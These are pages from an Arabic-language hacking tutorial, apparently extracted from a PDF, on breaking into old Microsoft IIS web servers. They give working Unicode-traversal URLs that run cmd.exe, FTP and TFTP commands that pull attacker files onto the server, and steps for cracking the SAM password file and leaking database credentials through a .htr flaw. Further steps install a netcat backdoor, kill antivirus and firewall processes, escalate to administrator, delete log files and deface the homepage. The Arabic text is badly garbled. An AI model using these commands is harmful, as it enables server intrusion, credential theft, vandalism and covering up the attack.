‫‪ -‬ﻛﯿﻔﯿﺔ ﻋﻤ ﻞاﻛﺎوﻧ ﺖﻟﻠﺪ ﺧﻮ لﺑﻮاﺳﻄﺔا ل ‪. FTP‬‬


‫ﺘﻔﺎدة ﻣﻦﺛﻐ ﺮةﻗﺪﯾﻤﺔ‬‫ﺘﻢاﻻﺳ‬ ‫ﺘﻰ ﯾ‬‫‪ -١‬ﻧﺴ ﺦ ﻣﻠ ﻒ ‪CMD‬اﻟﻰ ﻣﺠﻠﺪ ‪Scripts‬ﺑﺎﺳﻢ ‪ Shell.exe‬ﺣ‬
‫‪/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe‬‬
‫ﺘﺎﻟﻲ ‪open ftp.host.com‬‬ ‫ﺘﺎﺑﺔﻓﯿﻪاﻟ‬ ‫‪ -٢‬ﺎﻧﺸﺎ ء ﻣﻠ ﻒ ‪mspft.pll‬ﺑﻮاﺳﻄﺔاﻻﻣ ﺮ ‪ Echo‬وﻛ‬
‫ـ‪. FTP‬‬ ‫ﺣﯿﺚان ﻫﺬاﻫﻮاﻟﺨﺎدمﻟﻠ‬
‫‪/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl‬‬
‫‪ -٣‬ﺎﻻن ﻣﻄﻠﻮبا ﺿﺎﻓﺔ ﻣﺠﻬﻮ ل ‪Anonymous‬اﻟﻰ ﻧﻔ ﺲاﻟﻤﻠ ﻒاﻟﺬيﻗﻤﻨﺎﺑﺎﻧﺸﺎ ءه ‪mspft.pll‬‬
‫‪/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl‬‬
‫‪ -٤‬ﺎﻻن ﻣﻄﻠﻮبادراجاﻟﺒ ﺮﯾﺪ ‪hExRay@Hotmail.Com‬اﻟﻰ ﻧﻔ ﺲاﻟﻤﻠ ﻒاﻟﺬيﻗﻤﻨﺎﺑﺎﻧﺸﺎ ءه‬
‫‪mspft.pll‬‬
‫‪/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl‬‬
‫‪ -٥‬ﺈ ﺿﺎﻓﺔ ‪User‬ﻗﺒ ﻞ ‪Anonymous‬ﻟﺰوماﻟﻤﻠ ﻒاﻟﺬيﻗﻤﻨﺎﺑﺎﻧﺸﺎ ءه ‪mspft.pll‬‬
‫‪/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl‬‬
‫‪ -٦‬ﺎﻻنﺗﻜ ﺮار ﻟ ﺤﺎﺟﺔاﻻﻋﺪاد‬
‫‪/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl‬‬
‫ﻗﻊاﻟ ﺤﺎﻟﻲﻟﻠﻤﻠﻔﺎ ت‬ ‫ﺘﻢ ﻫﻨﺎادراجاﻟﻤﻮ‬‫‪ -٧‬ﯾ‬
‫‪/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl‬‬
‫ـ‪ FTP‬وﻫﻲ ‪Get index.htm‬ﺛﻢ‬ ‫ـ‪FTP‬اﻟﻼزﻣﺔﻟﺴ ﺤﺐاﻟﻤﻠ ﻒ ﻣﻦ ﺧﺎدماﻟ‬ ‫ﺘﺐاواﻣ ﺮاﻟ‬‫‪ -٨‬ﺎﻻن ﯾﻜ‬
‫ﯾﺪرج ﻫﻨﺎﺑﺪوناﻟﻤﺴ ﺞاﻟﺴﺎﺑ ﻖ‬
‫‪/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl‬‬
‫‪ -٩‬ﻫﻨﺎ ﻧﻔ ﺲاﻟﺴﺎﺑ ﻖ وﻟﻜﻦﺑﺎ ﺿﺎﻓﺔ ‪Quit‬‬
‫‪/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl‬‬
‫ﺘﻢﺗﻨﻔﯿﺬاﻣ ﺮ ”‪ FTP.exe?+"-s:c:winnt\mspft.ppl‬وﻫﻮ ﻋﺒﺎرة ﻋﻦ ﺧﻄﻮا تﻗﻤﻨﺎ‬ ‫‪ -١٠‬ﺎﻻن ﯾ‬
‫ﺘﻮاﺋﻬﺎ ﻋﻠﻰ ﻣﺎﯾﻠﻲ ‪-:‬‬‫ﺑﺎﻧﺸﺎ ءﻫﺎ وﻣﻮﺟﻮدةﻓﻲ ﻣﻠ ﻒ ‪mspft.ppl‬ﺑﺎ ﺣ‬
‫‪- Open FTP.host.com‬‬

‫‪٩٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪- Anonymous‬‬
‫‪- hEx@Hotmail.Com‬‬
‫‪- User Anonymous‬‬
‫‪- hEx@Hotmail.Com‬‬
‫‪- Get index.html‬‬
‫‪- Quit‬‬

‫‪/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-‬‬
‫"‪s:c:\winnt\mspft.ppl‬‬

‫ﺘﻮر ‪.‬‬ ‫‪ -‬ﻃ ﺮﯾﻘﺔﻛﺸ ﻒﺑﺎﺳﻮرداﻻدﻣﯿﻨﺴ‬


‫ﺘ ﺮﯾ‬
‫ﺘﺎجاﻟﻰ وﺟﻮدﺑ ﺮﻧﺎﻣﺠﯿﻦ ) ‪ ( Microsoft Access – L0phtCrack‬وﻫﻲﻟﺰومﺗﻨﻔﯿﺬﺑﻌ ﺾ‬ ‫ﻧﺤ‬
‫ﺘﺎﻟﯿﺔ وﻫﻲ ‪-:‬‬
‫اﻟﺨﻄﻮا تﻟ‬
‫ـ _‪SAM.‬ﻓﻲ دﻟﯿ ﻞ \‪\winnt\repair‬‬‫ﺘﻮرﻟﻠﺴﯿ ﺮﻓ ﺮ ﯾﻜﻮن ﻣﻮﺟﻮدﻓﻲ ﻣﻠ ﻒاﻟ‬‫ﺘﯿ‬‫‪ -‬ﺑﺎﺳﻮرداﻻدﻣﯿﻨﺴ‬
‫ﺘﺎﻟﻲ‪-:‬‬
‫واﻓ ﻀ ﻞﺑ ﺮﻧﺎﻣ ﺞ ﻟﻔﻚ ﺷﻔ ﺮةاﻟﺒﺎﺳﻮرد ﻫﻮﺑ ﺮﻧﺎﻣ ﺞ ‪L0phtCrack‬ﻛﻤﺎﻫﻮ ﻣﻮ ﺿﺢﺑﺎﻟﺸﻜ ﻞاﻟ‬

‫‪ -‬اذاﻛﺎن ﻫﻨﺎك ﻣﺴ‬


‫ﺘﺨﺪﻣﯿﻦﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ وﯾﻮﺟﺪﻟﺪﯾﻬﻢ ﺣﺴﺎبﻓﺎن ﻣﻌﻠﻮﻣﺎﺗﻬﻢ ﺳﻮ فﺗﻜﻮنﻓﻲ ﻣﻠ ﻒ‬
‫ﺘﺎ ح‬
‫ﺘ ﺮيﺑﻮاﺳﻄﺔﻫﺬااﻟﻤﻔ‬‫ﺘﻄﯿﻊﺗ ﺤﺪﯾﺪ ﻣﺴﺎر ﻫﺬااﻟﻤﻠ ﻒ ﻣﻦ ﺧﻼ لاﻟ ﺮﯾﺠﺴ‬
‫‪ PASSFILT.DLL‬وﻧﺴ‬
‫‪-:‬‬
‫‪HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\S‬‬
‫‪YSTEM32\PASSFILT.DLL‬‬

‫ـ ‪ASP‬ﻟﻠﻮ ﺻﻮ لاﻟﻰاﻟﺒﯿﺎﻧﺎ ت ﻣﻦ ﺧﻼ ل‬‫ﺘﺨﺪام ﺻﻔ ﺤﺎ تاﻟ‬‫ﺘﻤﺪﻓﻲاﻟﻘ ﺮا ءةﺑﺎﺳ‬‫‪ -‬ﺎذاﻛﺎناﻟﺴﯿ ﺮﻓ ﺮ ﯾﻌ‬


‫ﺘﺎجاﻟﻰﺗﻄﺒﯿ ﻖﺛﻐ ﺮة ) ‪ ( +.htr‬ﻟﻠﻮ ﺻﻮ لاﻟﻰﺑﺎﺳﻮرد‬ ‫ـ ‪MySQL‬ﻓﺴﻮ ف ﻧ ﺤ‬ ‫اﻟ‬ ‫ﻗﺎﻋﺪة‬
‫ﺘﺎﻟﻲ ‪-:‬‬‫اﻟﻤﺴﺌﻮ ل ﻋﻦ ﻫﺬةاﻟﻘﺎﻋﺪه وﻫﻲﻛﺎﻟ‬
‫‪http://www.xxxx.com/default.asp+.htr‬‬

‫ﺘﻨﻔﯿﺬﻓﺎﻟﻄ ﺮﯾﻘﺔ‬
‫ﺘ ﺤﺪﯾﺪﻓﻲ ﺳﯿﻜ ﺮﺑ ﺖاﻟ‬ ‫ﻋﻨﺪ ﻇﻬﻮر ﺻﻔ ﺤﺔاﻟﺨﻄﺎﻓﻲاﻟﻮ ﺻﻮ لاﻟﻰاﻟﺼﻔ ﺤﺔاﻟﻤﻄﻠﻮﺑﺔ وﺑﺎﻟ‬
‫ﺘﻮﯾﺎﺗﻪﻟﻠﻌﺜﻮر ﻋﻠﻰاﺳﻢ‬ ‫ﻗ ﺮا ءة ﻣ ﺤ‬‫ﺻ ﺤﯿ ﺤﺔ وﻣﺎﻋﻠﯿﻨﺎﻓﻘﻂ ﺳﻮى ﺳ ﺤﺐ ﻣﻠ ﻒ ‪ database.inc‬و‬
‫ﺘﺨﺪم واﻟﺒﺎﺳﻮردﻟﻠﻤﺴﺌﻮ ل ﻋﻦﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت ‪.‬‬
‫اﻟﻤﺴ‬

‫‪٩٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻊ وﻋﻤﻠﯿﺔاﻻبﻟﻮودﺑﻮاﺳﻄﺔﺑ ﺮﻧﺎﻣ ﺞ ‪. TFTP‬‬ ‫‪ -‬ﺗﻐﯿﯿ ﺮاﻟﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﯿﺔﻟﻠﻤﻮ‬


‫ـ \‪c:‬‬
‫ﻗﻢﺑﺎﻧﺸﺎ ء ﺻﻔ ﺤﺔ و ﺿﻊ ﺷﻌﺎرك ﻋﻠﯿﻬﺎ وا ﺣﻔﻈﻬﺎﺑﺎﺳﻢ ‪ index.htm‬ﻋﻠﻰاﻟ‬ ‫‪-١‬‬
‫ﺘﺎﻟﯿﺔ ‪.‬‬
‫ﺘﺸﻐﯿ ﻞﺑ ﺮﻧﺎﻣ ﺞ ‪ TFTP‬وﻧﻔﺬاﻻﻣ ﺮﻓﻲاﻟﻔﻘ ﺮةاﻟ‬
‫ﻗﻢﺑ‬ ‫‪-٢‬‬

‫‪/c+tftp.exe+"-‬‬
‫‪i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\i ndex.htm‬‬

‫وﻫﻮاﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻼزمﻟﻌﻤ ﻞاﻻبﻟﻮود وﯾﺠﺐان ﯾﻜﻮن ﺷﻐﺎ لﻓﻲ ﺣﺎﻟﺔﺗﻨﻔﯿﺬ‬


‫‪tftp.exe‬‬
‫اﻻﻣ ﺮ‬
‫"‪"-i‬‬ ‫ﺘﺒﺔاﻟﻤﻠﻔﺎ ت‬
‫ﺘ ﺮزﻟﺰومﻗ ﺮا ءاﻟﺒﯿﺎﻧﺎ تﻓﻲ ﻣﻜ‬
‫وﻫﻮﺑﻤﺜﺎﺑﺔﺑﺎراﻣﯿ‬
‫‪1.1.1.1‬‬ ‫ﻗﻢاﻻﯾﺒﻲاﻟﺨﺎ صﺑﻚ‬
‫ﺮ‬
‫‪GET‬‬ ‫ﺘﻘﺒﺎ ل‬
‫ﻮﻫﻮاﻻﻣ ﺮاﻟﻼزمﻟﻄﻠﺐاﻟﻤﻠﻔﺎ ت ﻣﺎﺑﯿﻦاﻻرﺳﺎ ل واﻻﺳ‬
‫‪index.htm‬‬ ‫ﺎﺳﻢاﻟﻤﻠ ﻒﺑﺠﻬﺎزك‬
‫‪\inetpub\wwwr‬‬
‫ﺎﺳﻢاﻟﺪﻟﯿ ﻞﻓﻲاﻟﺴﯿ ﺮﻓ ﺮ‬
‫\‪oot‬‬

‫‪index.htm‬‬ ‫اﺳﻢاﻟﻤﻠ ﻒ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ‬

‫ﺘﻌ ﺮ ف ﻋﻠﯿﻚ ‪.‬‬‫ﺘﻢاﻟ‬ ‫ﺘﻰ ﻻ ﯾ‬‫‪ -‬ﻣﺴﺢ ﻣﻠﻔﺎ تاﻟﻠﻮ ق ﺣ‬


‫ـ ‪ Log‬ﻣﻦ ﻣﺠﻠﺪ ‪System32‬ﺑﻮاﺳﻄﺔاﻻﻣ ﺮ ‪-:‬‬ ‫ﺘﻢ ﻫﺬهاﻟﻌﻤﻠﯿﺔ ﻣﻦ ﺧﻼ ل ﺣﺬ ف ﻣﻠﻔﺎ تاﻟ‬
‫وﺗ‬
‫‪/c+del+c:/winnt/system32/logfiles/*.log‬‬

‫‪....‬‬

‫‪٩٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﻹﺧﱰاق ﻋﻦ ﻃﺮﯾﻖ اﻟﯿﻮﻧﯿﻜﻮد )اﳉﺰء اﻟﺜﺎﻧﻲ( "‬

‫‪$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ ‪XDEMONX:‬‬
‫‪$$$$$$$$$$$$$$‬‬

‫ﺘﻄﯿﻊاﻟﺠﻤﯿﻊﺗﻄﺒﯿﻘﻬﺎ ‪..‬اﻣﺎﻓﻲﻫﺬااﻟﺪرسﻓﺎﻷﻣ ﺮ‬
‫ﻓﻲ اﻟﺪرساﻷو ل ﻛﺎن ﻋﺒﺎرة ﻋﻦاواﻣ ﺮاﺳﺎﺳﯿﺔ ﯾﺴ‬
‫ﺘﻄﻠﺐﺑﻌ ﺾاﻟﺬﻛﺎ ء واﻟﻤﻬﺎرة ‪..‬‬
‫ﯾ‬

‫اﻟﺒﺪاﯾﺔ ‪:‬‬
‫‪--------------‬‬

‫ﻗﻊ ﻣﺼﺎبﺑﺜﻐ ﺮة ﻣﺎ )ﯾﻮﻧﯿﻜﻮد(ﻓﺎناو ل ﺷﻲ ﻋﻠﯿﻚاﻟﻘﯿﺎمﺑﻪﻫﻮ ﻧﺴ ﺦ ﻣﺠﻠﺪ ‪ cmd‬ﺎﻟﻰ ‪cmd1‬‬


‫ﻋﻨﺪ وﺟﻮد ﻣﻮ‬
‫ﺑﻬﺬهاﻟﻄ ﺮﯾﻘﺔ‪:‬‬
‫‪C+copy+c:\winnt\system32+‬‬
‫ﺘﺎﺑﺔ ‪Echo ..‬‬ ‫‪c:\winnt\system32\cmd1.exe‬ﻮاﻟﺴﺒﺐ ﻫﻮﺗﻔﻌﯿ ﻞاﻣ ﺮ ﺎﻟﻜ‬
‫ﺘﺬﻛﯿ ﺮﻓﻘﻂ !‬
‫ﻮﺑﻌﺪ ذﻟﻚ ﻧﻔﺬاﻟﺜﻐ ﺮة ﻣﻦاﻟﻤﻠ ﻒاﻟﺠﺪﯾﺪ ( ‪CMD1.exe‬ﻫﺬا ﺷﻲ ﯾﻌ ﺮﻓﻪ ﺎﻟﺠﻤﯿﻊ (ﻟﻜﻦﻟﻠ‬

‫ﺘﺼﻔﺢ ‪ ..‬ﻣﻦ ﺧﻼ ل ﻫﺬهاﻟﺜﻐ ﺮةﻓﺎﻧﻪ ﺳﯿﻜﻮنﻟﺪﯾﻚ ﺻﻼ ﺣﯿﺎ ت‬ ‫ﻗﻊ ﻣﻦاﻟﻤ‬‫ﺎﻻن ﻋﻨﺪﺗﺼﻔ ﺤﻚﻟﻤﻠﻔﺎ تاﻟﻤﻮ‬
‫ﺘﻤﻲﻟﻠﻤﺠﻤﻮﻋﻪ ‪ Guest‬ﻮﻫﻮاﻟﯿﻮزراﻟﻤﺴﺆوو ل‬ ‫ﺘﺨﺪم ﻫﻮ ﻋﺒﺎرة ﻋﻦ ﯾﻮزر ﯾﻨ‬
‫‪IWAM_USER‬ﻮﻫﺬااﻟﻤﺴ‬
‫ﻋﻦﺗﺸﻐﯿ ﻞ ﺳﯿ ﺮﻓ ﺮ‪IIS .‬‬
‫ﻮﺑﻤﺎاﻧﻪ ﻣﻦ ﻣﺠﻤﻮﻋﺔ ‪Guest‬ﻓﻬﻮ ﻻ ﯾﻤﻠﻚ ﺻﻼ ﺣﯿﺎ تﻛﺜﯿ ﺮة !!اﻻاذاﺗﻢاﻋﺪادهﺑﺸﻜ ﻞ ﺳﻲ ء ‪(:‬‬

‫ﻻﯾﻮﺟﺪ ﺷﻲاﻛﺜ ﺮادﻣﺎﻧﺎ ﻣﻦ ﻣ ﺤﺎوﻟﺔاﻟ ﺤﺼﻮ ل ﻋﻠﻰ روو ت ‪(:‬ﻫﺬاﻓﻲاﻧﻈﻤﺔ ‪ *nix‬ﺎﻣﺎﻓﻲ ‪Microsot‬‬
‫ﻗﻌﻬﺎ‬‫ﺘﻮ‬‫ﺘﻲﺗ‬ ‫ﺘﻠ ﻒ ‪(:‬ﻓﺈن ﻣ ﺤﺎوﻟﺔاﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﺻﻼ ﺣﯿﺎ ت ‪Administrator‬ﻟﯿ ﺲﺑﺎﻟﺴﻬﻮﻟﺔاﻟ‬ ‫ﻓﺎﻟﻮ ﺿﻊ ﻣﺨ‬
‫ﺘﻌﺪى ﻋﺪدﻫﺎا ﺻﺎﺑﻊاﻟﯿﺪ‬ ‫ﺘﯿﺎزا تﺑﺸﻜ ﻞ ﻣ ﺤﻠﻲﻓﻲاﻧﻈﻤﺔ ﻣﺎﯾﻜ ﺮوﺳﻮﻓ ﺖ ﻣﻤﻜﻦﻓﻘﻂﺑﻄ ﺮ قﻗﻠﯿﻠﺔ ﻻ ﯾ‬ ‫‪(:‬ﻓ ﺮﻓﻊاﻻﻣ‬
‫ﺘﺐ ﻫﺬااﻟﻤﻮ ﺿﻮ ع ﻻﺷ ﺮ حﻛﯿﻔﯿﺔا ﺣﻜﺎماﻟﺴﯿﻄ ﺮة ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮ واﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﺣﺴﺎب‬ ‫اﻟﻮا ﺣﺪه ‪ ..‬واﻧﺎاﻛ‬
‫ﺘﻊﺑﺠﻤﯿﻊ ﻣﻮارداﻟﻨﻈﺎم ‪..‬‬ ‫ﺘﻤ‬‫ﻣﻜﺎﻓﻲ ءﻟﻠﻤﺪﯾ ﺮ ‪ (:‬واﻟ‬
‫‪+‬ﺎﻟﻤﻠﻔﺎ تاﻟﻤﻄﻠﻮﺑﺔ ‪:‬‬
‫‪Sechole.exe‬ﻮﻣﻠ ﺤﻘﺎﺗﻬﺎ‪.‬‬
‫‪Kill.exe‬‬
‫‪Tlist.exe‬‬
‫‪ncx99.exe‬‬
‫‪tftpd32.exe‬‬

‫ﺟﻬﺰاﻟﻌﺪه ‪.. (:‬‬


‫ﺘﻬﺎﻓﻲ ﻣﺠﻠﺪ وا ﺣﺪﻫﻨﺎ‬ ‫ﻗ ﺖ ﺟﻤﻌ‬ ‫ﺘﻮﻓﯿ ﺮاﻟﻮ‬
‫ﻟ‬
‫ﺎﻻن ﺳﺄﺷ ﺮ ح ﻋﻤ ﻞﻛ ﻞاداة ‪:‬‬

‫ﺘﯿﺎزا تﺑﺸﻜ ﻞ ﻣ ﺤﻠﻲ ‪ ..‬و ﻃ ﺮﯾﻘﺔ ﻋﻤﻠﻪ )ﺑﺸﻜ ﻞ ﻣﺒﺴﻂ(‬


‫ﺘﺜﻤﺎر ﻣﻮﺟﻮدﻟ ﺮﻓﻊاﻻﻣ‬
‫ﻗﻮىاﺳ‬ ‫‪Sechole -١‬ﻮﻫﻮا‬
‫ﺘﺼﺎب ﻋﻤﻠﯿﺔﺗﺎﺑﻌﻪﻟﻤﺪﯾ ﺮاﻟﻨﻈﺎم ﯾﻘﻮم‬ ‫ﺘﻄﯿﻊ ﻣﻦ ﺧﻼﻟﻪ ﺎﻏ‬ ‫ﺘﻤﺪ ﻋﻠﻰ ﺻﺪ عﻓﻲ ﻧﻮاة وﯾﻨﺪوزانﺗﻲ ‪ ..‬ﯾﺴ‬
‫ﺑﺄﻧﻪ ﯾﻌ‬

‫‪١ ٠٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﯿﺎزاﺗﻚ ‪. (:‬‬
‫ﻣﻦ ﺧﻼﻟﻬﺎﺑ ﺮﻓﻊاﻣ‬

‫ﺘﻲ‬ ‫ﻗﻔﺎ ل ﺎﻟﻔﺎﯾ ﺮوو ل ‪+‬اﻻﻧ‬


‫ﺘﻲﺗﻌﻤ ﻞﺑﺎﻟﺨﻠﻔﯿﻪ ‪ ..‬واﻟﻔﺎﺋﺪه ﻣﻨﻬﺎ ﻫﻮا‬ ‫‪list -٢‬ﺗﻘﻮمﺑﻌ ﺮ ض ﺟﻤﯿﻊاﻟﻌﻤﻠﯿﺎ تاﻟ‬
‫ﻓﺎﯾ ﺮوس ‪(:‬‬
‫ﺘﺨ ﺮج ﻣﻦاﻻداةاﻟﺴﺎﺑﻘﺔ ‪.‬‬ ‫ﻗﻢاﻟﻌﻤﻠﯿﺔاﻟﻤﺴ‬‫ﻗﻔﺎ ل ر‬‫ﺘﻘﻮمﺑﺎ‬ ‫ﺘﻤ ﻢﻟﻼداةاﻟﺴﺎﺑﻘﺔ ﺣﯿﺚ ﺳ‬ ‫‪Kill.exe -٤‬ﻋﻤﻠﻬﺎ ﻣ‬
‫‪NCX99 ٥‬ﻧﺴﺨﻪ ﻣﻄﻮرة ﻣﻦ ﺎﻟﺒﺎﻛﺪوور ‪ NC‬ﯾﻨﺼ ﺖ ﻋﻠﻰاﻟﻤﻨﻔﺬ ‪٩٩‬‬
‫‪4- TFTP32.exe‬ﻟﻨﻘ ﻞاﻟﻤﻠﻔﺎ تاﻟﻰاﻟﺴﯿ ﺮﻓ ﺮ ‪..‬‬

‫ﻛ ﻞ ﻣﺎ ﺳﺒ ﻖﻛﺎن ﻋﺒﺎرة ﻋﻦ ﻣﻘﺪﻣﻪ ‪(:‬اﻣﺎاﻟﻌﻤ ﻞاﻟ ﺤﻘﯿﻘﻲ ﺳﯿﺒﺪأاﻻن ‪:‬‬

‫اوﻻﻗﻢﺑ ﺮﻓﻊ ﺟ ﻤﯿﻊاﻻدوا تاﻟﺴﺎﺑ ﻖاﻟﻰاﻟﺴﯿ ﺮﻓ ﺮ ‪..‬‬


‫ﺘﺸﻐﯿ ﻞ ‪ncx99.exe‬ﺑﻬﺬااﻟﺸﻜ ﻞ ﻣﺜﻼ ‪:‬‬ ‫ﺛﻢﻗﻢﺑ‬
‫‪http://target/scripts/..À ¯../winnt/system32/cmd1.exe?/c+C:\ncx99.exe‬‬
‫ﻗﻊ ﻋﻠﻰاﻟﺒﻮر ت ‪.. ٩٩‬‬ ‫ﺑﻌﺪ ذﻟﻚﻗﻢﺑﺎﻻﺗﺼﺎ لﺑﺎﻟﻤﻮ‬
‫ﺘﯿﺎزا ت‪= Guest .‬‬ ‫ﺘ ﺤﺼ ﻞ ﻋﻠﻰ ﺳﻄ ﺮاواﻣ ﺮ ‪CMD‬ﺑﺪون ﺎﻣ‬ ‫ﺳ‬
‫ﻗﻢاﻟﻌﻤﻠﯿﺔ‬ ‫ﺘﻲﺗﻌﻤ ﻞ ‪..‬ﻗﻢﺑﺎﻟﺒ ﺤﺚ ﻋﻦ ر‬ ‫ﺘﻌ ﺮ ضﻟﻚ ﺟﻤﯿﻊاﻟﻌﻤﻠﯿﺎ تاﻟ‬ ‫ﺘﺸﻐﯿ ﻞاﻻداة ‪ TLIST ..‬ﺳ‬ ‫ﺎﻻنﻗﻢﺑ‬
‫ﺘﻲﻓﺎﯾ ﺮوسان وﺟﺪ ‪ ..‬وﻛﺬﻟﻚاذا ﻮﺟﺪ ت ﺟﺪار ﻧﺎري ‪..‬‬ ‫‪PID‬ﺎﻟﺨﺎ صﺑﺎﻻﻧ‬
‫ﻗﻪ ﺟﺎﻧﺒﯿﻪ ‪..‬‬‫ﺘﻲﻓﺎﯾ ﺮوس واﻟﻔﺎﯾ ﺮوو ل ﻋﻠﻰ ور‬ ‫ﻗﻢ ‪ PID‬ﺎﻟﺨﺎ صﺑﺎﻻﻧ‬ ‫ﺳﺠ ﻞ ر‬
‫ﻗﻢاﻟﻌﻤﻠﯿﺔ ‪(:‬‬‫ﺘ ﻞاﻻﺟ ﺮا ءﺑﺎﻻداة ‪Kill‬ﺑﻬﺬااﻟﺸﻜ ﻞ ‪ : KILL.exe PID ..‬ﻣﻜﺎن ‪PID‬ﺗ ﻀﻊ ر‬ ‫ﺎﻻنﻗﻢﺑﻘ‬
‫ﺘﻲﻓﺎﯾ ﺮوس‬ ‫ﺘ ﺤﺪﯾﺜﺎ تاﻻ ﺧﯿ ﺮة ﻣﻦاﻧ‬
‫ﺘﻲﻓﺎﯾ ﺮوس ؟ ﺎﻻﺟﺎﺑﺔ ‪..‬أناﻟ‬ ‫ﻗﻔﺎ لاﻻﻧ‬
‫ﯾﺴﺄ لاﻟﺒﻌ ﺾ ! ﻣﺎﻟﻬﺪ ف ﻣﻦا‬
‫ﺘﺸﻐﯿ ﻞ‬‫ﺘﻌﺎﻣ ﻞ ﻣﻊ ‪ Sechole‬ﻋﻠﻰاﻧﻪﺑﺎﻛﺪور ‪ ..‬ﻮاﻻنﺑﻌﺪاﺗﻤﺎماﻟﻌﻤﻠﯿﺎ تاﻟﺴﺎﺑﻘﺔﺑﻨﺠﺎ ح ‪..‬ﻗﻢﺑ‬ ‫ﺗ‬
‫ﺘﺼﻔﺢ‪.‬‬ ‫)‪Sechole.exe :‬ﻣﻦاﻟﻤ‬

‫ﺘﯿﺎزا ت ‪ IWAM_USER‬ﺎﻟﻰ ﻣﺠﻤﻮﻋﻪ‪Administrators ..‬‬ ‫ﺘﻢ رﻓﻢاﻣ‬‫ﻋﻨﺪﻫﺎ ﺳﯿ‬


‫ﺎﻻنﺑﺈﻣﻜﺎﻧﻚﺗﻨﻔﯿﺬه ﺟﻤﯿﻊاﻻواﻣ ﺮﺑﻜﺎﻣ ﻞاﻟ ﺤ ﺮﯾﻪ وﺑﺪوناي ﻣﺸﺎﻛ ﻞﻓﻲاﻟﺼﻼ ﺣﯿﺎ ت‪Access Denided .‬‬
‫ﺘﺎﺑﺔ ﻋﻠﻰاﻟﺼﻔ ﺤﻪاﻟ ﺮﺋﯿﺴﯿﺔﺑﺎﻣ ﺮاﻻﯾﻜﻮ‪:‬‬ ‫ﻮ ﻃﺒﻌﺎاﻫﻢ ﺷﻲاﻟﻜ‬
‫‪C+Echo+Hacked+by+XDeMoNX+‬‬
‫‪> +C;\inetpub\wwwroot\index‬‬
‫‪.htm‬‬

‫ﻮﻟﻜﻦﻟﯿ ﺲ ﻫﺬاﻛ ﻞ ﺷﻲ ‪..‬‬


‫ﺘﻮي ﻋﻠﻰ‬
‫ﻗﻊ ﻣﻬﻢاو ﯾ ﺤ‬
‫ﺎﻟﻘ ﺮا ﺻﻨﻪاﻻذﻛﯿﺎ ء ﻻ ﯾﺒ ﺤﺜﻮنﻓﻘﻂ ﻋﻦﺗﻐﯿﯿ ﺮ ﺎﻟﺼﻔ ﺤﻪاﻟ ﺮﺋﯿﺴﯿﺔ ﺧﺼﻮ ﺻﺎاذاﻛﺎناﻟﻤﻮ‬
‫ﻣﻌﻠﻮﻣﺎ تاوﻗﻮاﻋﺪﺑﯿﺎﻧﺎ ت ‪...‬ﺈﻟ ﺦ ‪(:‬‬

‫ﺘﻄﯿﻊاﻟﺪ ﺧﻮ لﺑﻬﺬااﻟﯿﻮزر ؟ ‪ IWAM_USER‬ﺎﻟﻰاي ﺧﺪﻣﻪ ﻣﺜ ﻞﺗﻠﻨ ﺖاوا فﺗﻲﺑﻲ ؟؟‬ ‫ﺳﺆا ل ‪:‬ﻫ ﻞﺗﺴ‬
‫ﺘﻜﻮن ﻣﺴﻨﺪهﺑﺸﻜ ﻞ‬
‫ﺘﯿﺰاﺗﻪﻟﻜﻨﻨﺎ ﻻ ﻧﻤﻠﻚﻛﻠﻤﻪاﻟﻤ ﺮور !ﻻﻧﻬﺎ ﺳ‬
‫ﺎﻻﺟﺎﺑﺔ ‪ :‬ﻻ ‪ ..‬ﺻ ﺤﯿﺢاﻧﻨﺎﻗﻤﻨﺎﺑ ﺮﻓﻊاﻣ‬
‫ﻋﺸﻮاﺋﻲ ‪.‬‬

‫‪١ ٠١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺳﯿﺬﻫﺐﺗﻔﻜﯿ ﺮاﻟﺒﻌ ﺾاﻟﻰ ﺎﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﻣﻠ ﻒاﻟﺴﺎم وﻛﺴ ﺮه ‪(:‬ﻫﺬا ﻣﻤﻜﻦ ‪..‬ﻟﻜﻦ ﯾﻮﺟﺪ ﻣﺎﻫﻮاﺳﻬ ﻞ ‪.‬‬
